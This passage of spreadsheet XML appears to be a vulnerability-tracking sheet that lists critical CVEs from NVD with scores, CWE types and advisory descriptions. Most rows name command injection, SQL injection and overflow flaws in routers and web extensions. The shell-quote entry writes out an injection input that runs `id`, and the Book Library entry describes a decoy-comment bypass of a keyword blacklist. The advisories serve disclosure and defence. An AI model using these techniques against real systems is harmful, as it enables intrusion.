      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in FAST FAC1900R 20190827_2.0.2. Affected by this issue is the function copy_msg_element of the component devdiscover Service. Such manipulation leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101039</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101075</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Netcore NR289-GE 1.4.5102. The impacted element is the function system of the file /location_time.cgi of the component Location Time Handler. The manipulation of the argument mac leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101075</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101108</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Vehicle Manager (Free) &lt; 6.5.8 - site/vehiclemanager.php reads the order_field and order_direction sort parameters at three separate anonymous-reachable frontend entry points (category listing, search, and the all-vehicles listing) through a sanitizing function that applies real escaping, but the value is then placed into an unquoted ORDER BY clause, where escaping has no protective effect.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101108</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101110</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Book Library (Free) &lt; 6.4.6 - site/booklibrary.php’s books() function reads the field and direction request parameters and passes each through a function called protectInjectionWithoutQuote(), whose only real protection is a keyword blacklist that, on detecting the literal substring select, wraps the value in $db-&gt;quote() instead of rejecting it. The value is then concatenated directly into an unquoted ORDER BY clause, a position where quoting provides no protection at all. Reaching the vulnerable code path requires two conditions: a first request to prime session-stored sort defaults, and a trailing decoy comment (-- xselect) that satisfies the blacklist’s substring check without altering the payload’s effect.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101110</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101891</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-923</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in an internal API service on WatchGuard Access Points allows an unauthenticated attacker with network access to the AP to obtain a valid API session.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101891</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73640</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Time Based-Blind SQL Injection in password recovery functionality. The unauthenticated attacker can prepare GET request with one of the parameters filled in with an arbitrary SQL query. The parameter is interpreted as part of SQL predicate resulting in Time-Based Blind SQL Injection.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73640</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86102</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-863</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the WatchGuard AP internal API service allows an attacker with network access to the AP to execute arbitrary shell commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86102</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102422</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function emits a `{ comment }` token as `#` followed by its text, which comments out the rest of the shell line, including the opening quote of any later string token. A line terminator (\n, \r, U+2028, U+2029) in that later string therefore ends the comment, and the rest of the string is parsed as shell input: `quote(['echo', 'ok', { comment: 'x' }, 'a\nid;#'])` runs `id` in sh, bash, dash, ksh and zsh. `parse()` emits a comment token for a `#` in the middle of a word (for example `http://example.com/#frag`), so callers that combine `parse()` output with another untrusted string, such as `quote(parse(untrustedCommand).concat(untrustedArg))`, are affected. The fix for CVE-2026-9277 rejected line terminators in the comment's own text, but not in the tokens after it. Fixed in 1.11.0: `quote()` throws a `TypeError` when a string after a `{ comment }` token contains a line terminator.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102422</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73642</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Path Traversal  in file download functionality. An unauthenticated attacker can sent GET request with file path parameter set to any path including an absolute
local file path.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73642</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101081</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in D-Link DI-8400 16.07. This vulnerability affects the function menu_nat_more_asp of the file menu_nat_more.asp of the component Web Administration Service. The manipulation of the argument opt results in stack-based buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101081</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101187</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Ziroom ZHOME A0101 1.0.1.0. This vulnerability affects the function pop_usb_device of the file usr/lib/lua/luci/controller/api/zrUsb.lua of the component USB Device Management API. This manipulation of the argument path causes command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101187</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101260</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Ziroom ZHOME A0101 1.0.1.0. Affected by this issue is some unknown functionality of the file /api/ZRnetwork/firstLogin. Performing a manipulation of the argument firstLogin results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101260</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101261</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Ziroom ZHOME A0101 1.0.1.0. This affects an unknown part of the file /api/ZRnetwork/firstSetup_wifi. Executing a manipulation of the argument login_pwd can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101261</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101262</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0. This vulnerability affects unknown code of the file /api/ZRQos/set_online_client. The manipulation of the argument ip leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101262</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101263</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ziroom ZHOME A0101 1.0.1.0. This issue affects some unknown processing of the file /api/ZRQos/set_online_client. The manipulation of the argument mac results in command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101263</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101264</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
